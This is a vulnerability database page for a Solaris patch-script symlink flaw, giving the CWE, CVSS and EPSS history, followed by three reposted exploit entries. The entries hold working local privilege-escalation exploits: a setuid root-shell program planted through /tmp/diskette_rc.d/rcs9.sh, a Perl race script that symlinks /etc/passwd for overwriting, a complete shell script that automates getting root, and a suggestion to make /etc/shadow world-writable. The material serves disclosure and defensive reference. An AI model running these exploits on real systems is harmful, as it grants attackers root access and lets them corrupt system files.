CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary file, related to use of Update Manager.
Improper Link Resolution Before File Access ('Link Following') The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
3.3
AV:L/AC:M/Au:N/C:P/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.76%
–
–
2022-03-27
–
–
1.76%
–
–
2022-04-03
–
–
1.76%
–
–
2022-04-17
–
–
1.76%
–
–
2022-08-28
–
–
1.76%
–
–
2023-03-05
–
–
1.76%
–
–
2023-03-12
–
–
–
0.05%
–
2023-03-19
–
–
–
0.05%
–
2023-04-09
–
–
–
0.05%
–
2023-04-16
–
–
–
0.05%
–
2023-05-14
–
–
–
0.05%
–
2023-05-28
–
–
–
0.05%
–
2023-07-16
–
–
–
0.05%
–
2023-07-30
–
–
–
0.05%
–
2023-09-17
–
–
–
0.05%
–
2023-11-26
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.07%
2025-03-30
–
–
–
–
0.07%
2025-04-10
–
–
–
–
0.07%
2025-04-11
–
–
–
–
0.07%
2025-04-15
–
–
–
–
0.07%
2025-04-15
–
–
–
–
0.07,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2013-07-08 22h00 +00:00 Author : Larry W. Cashdollar EDB Verified : No
Solaris Recommended Patch Cluster 6/19 local root on x86
Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall
782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi
Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrstmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases
./141445-09/SUNWos86r/install/postinstall
656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 659 fi
Well, it looks like you've got a few chances to abuse it:
larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postinstall
Psuedo PoC:
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
chmod 666 /etc/shadow would be easy.
PoC:
larry@slowaris:~$ cat setuid.c
#include
#include
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setregid (0, 0);
setreuid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
gcc -o /tmp/r00t setuid.c
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t
After patches have been applied:
larry@slowaris:~$ /tmp/r00t
# id
uid=0(root) gid=0(root)
Publication date : 2012-08-10 22h00 +00:00 Author : Larry Cashdollar EDB Verified : No
source: https://www.securityfocus.com/bid/54919/info
Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain elevated privileges on affected computers.
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobber\n";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}
}
Publication date : 2010-03-23 23h00 +00:00 Author : Larry W. Cashdollar EDB Verified : Yes
source: https://www.securityfocus.com/bid/38928/info
Sun Connection Update Manager for Solaris creates temporary files in an insecure manner.
An attacker with local access could potentially exploit these issues to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.
Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial-of-service or privilege escalation. Other attacks may also be possible.
These issues affect unknown versions of the application. In addition, these issues may affect certain Solaris patch clusters or individual patch releases.
#!/bin/sh
#Larry W. Cashdollar, local root for Solaris x86 during patching
#10/4/2013 Tested on Cluster 9/30/2013
# larry@s0l4r1s:~$ ./disk_exp.sh
# [+] Creating evil shell
# [+] Hope you've got gcc on here, compiling...
# [+] Waiting for root shell
# [+] Tada!
# # id
# uid=0(root) gid=0(root)
echo "[+] Creating evil shell"
cat << EOF > r00t.c
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setreuid (0, 0);
setregid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
EOF
echo "[+] Hope you've got gcc on here, compiling..."
gcc r00t.c -o /tmp/r00t
mkdir -p /tmp/diskette_rc.d/
echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh
echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
chmod +x /tmp/diskette_rc.d/rcs9.sh
echo "[+] Waiting for root shell"
until [ -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t